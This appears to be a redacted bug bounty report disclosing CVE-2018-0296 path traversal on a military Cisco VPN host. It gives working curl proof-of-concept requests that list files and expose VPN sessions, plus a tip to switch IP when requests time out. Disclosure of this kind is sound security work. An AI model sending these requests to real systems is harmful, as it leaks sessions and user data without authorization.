[CVE-2018-0296] Cisco VPN path traversal on the https://███████/ (████.███.mil)

##Description I discovered previously unidentified instance https://█████████ (████.██████.mil) in █████████ network, vulnerable to the CVE-2018-0296 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0296) ##POC ``` curl -i -k "https://████/+CSCOU+/../+CSCOE+/files/file_list.json" --path-as-is ``` █████████ We can disclose user sessions by quering /sessions: ``` curl -i -k "https://█████/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" --path-as-is ``` ##Suggested fix Updating to the latest version should fix the issue. Fixed version should give 404 "File not found" error. Example of patched version: ``` curl -i -k "https://█████████.██████/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" --path-as-is ``` ##Notes In case you experience request timeout when reproducing, try to change your IP/VPN. ## Impact Path traversal, which can allow the unauthenticated attacker disclose sensitive information such as VPN sessions, files, usernames. Under some conditions it's possible to cause DOS attacks